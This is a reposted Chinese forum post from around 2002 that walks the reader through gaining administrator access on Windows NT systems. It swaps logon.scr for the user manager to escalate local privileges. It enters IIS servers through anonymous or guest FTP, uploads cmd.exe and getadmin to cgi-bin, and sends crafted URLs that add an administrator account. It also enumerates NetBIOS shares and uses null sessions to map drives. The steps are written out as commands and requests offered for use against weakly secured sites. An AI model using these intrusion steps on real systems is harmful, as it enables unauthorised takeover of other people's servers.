精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>网络专区>>● Internet>>
浏览技巧
>>Administrastor真不安全(转载)

主题:Administrastor真不安全(转载)
发信人: 2001asp(ujj)
整理人: snowypeng(2002-05-23 09:29:25), 站内信件
 之一: 

  如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号: 

  先把c:\winnt\system32下的logon.scr改名为logon.old备份 
  然后把usrmgr.exe改名为logon.scr 
  然后重新启动 
  logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界 
面,而是用户管理器 
  这时他就有权限把自己加到Administrator组 
  不要忘记把文件名改回来啊! 


  之二: 

  下面的技术适用于不重视NT网络安全的网站, 
  一些 http的技术也可以供较高级的人员参考 

  进入NT网络可以采取下面的步骤: 

  因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的,有些ano 
nymous的帐号还有upload权限, 
我们就要攻击这类站点。因为如果不允许匿名帐号,就可能造成明文密码在网上传 
输。用tcpspy的工具可以截获 
这些密码。现在不谈这些比较高级的技术。 

  正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。 
我们用ftp登陆一个NT server, 
比如:www.xxx.com(示例名): 

  ftp www.xxx.com 
  Connected to www.xxx.com 
  220 ntsvr2 Microsoft FTP Service (Version 3.0). 

  ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSE 
R_ntsvr2的用户帐号,属于 
Domain user组,这个帐号我们以后要用来获取Administrator的权限 

  User (www.xxx.com:(none)):anonymous 
  331 Anonymous access allowed, send identity (e-mail name) as passw 
ord. 

  Password: 输入 guest@ 或者guest 

  对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有 
设置密码。那么guest帐号就是 
一个可用的正确的用户帐号,虽然只属于Domain guest组 

  在这种情况下我们就可以进NT server的ftp了。 

  进去以后,看看目录列表,试试 cd /c 或wwwroot等关键目录,如果运气好,改 
变目录成功,这时你就有了80% 
的把握。 

  现在,开始查找cgi-bin目录(或者scripts目录),进去以后, 
  把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-b 
in 
  然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN 

  大约十多秒后屏幕显示: 

  CGI Error 

  这时有90%的可能是:你已经把IUSER_ntsvr2升级为Administrator,也就是任 
何访问该web站的人都是管理员 

  面可以add user: 

  http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe% 
20user%20china%20news%20/add 

  这样就创建了一个叫china用户,密码是news,然后: 
  http://www.xxx.com/cgi-bin/getadmin.exe?china 

  或者 

  http://www.xxx.com/scripts/tools/getadmin.exe?china 
  你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的 
方法直接修改如果没有cmd.exe, 
也可以自己传一个上去到scripts/tools或者cgi-bin目录. 

  之三: 

  用NT的Netbios技术扫描 
   
  nbtstat -a http://www.xxx.com/ 

  或者 

  nbtstat -A http://www.xxx.com/ 

  这样可以得到其域的共享资源名称 

  net view file://www.xxx.com/ 

  可以获得其机器的共享资源名称,如果有c盘 

  net use f: file://www.xxx.com/c 

  可以用f:映射其c盘 

  net use \\111.111.111.111\ipc$ "" /user:"" 

  之四: 
   
  Unix下移植过来的工具: 

  Windows95&98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包: 

  WinDump95.exe 使用前还要下载这个库 Packet95.exe 

  WindowsNT用户的版本 

  WinDump.exe PacketNT.exe 
 



----
E网情深国立华侨大学商检95本主页(http://www.sj95.com)

             

[关闭][返回]